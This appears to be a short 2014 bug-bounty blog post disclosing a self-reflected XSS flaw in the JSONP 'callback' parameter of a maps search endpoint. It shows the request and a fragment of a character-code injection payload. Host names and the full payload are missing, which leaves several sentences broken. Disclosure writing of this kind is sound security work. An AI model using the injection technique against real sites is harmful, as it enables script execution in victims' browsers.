Self reflected XSS in

This bug was valid for 24 days. Later, it turned up that it’s a duplicate (#@&!).

After typing some text into the search box (i.e. “New York, NY”) and clicking the “Search Maps” button there is a GET request to

GET /onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=mycjson14 HTTP/1.1

callback” parameter is vulnerable to JavaScript injection, for example by using the following payload:


You can see the effect by visiting the following link:,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));

This content will be then executed in

XSS is exploitable only by visiting and modifying the request to (or another website, which will contain a request to that vulnerable link).


[February 2nd 2014] - bug was reported
[March 5th 2014] - bug was marked as a duplicate

P.S. No screenshots this time, please enjoy the video:

Leave a Reply

Your email address will not be published. Required fields are marked *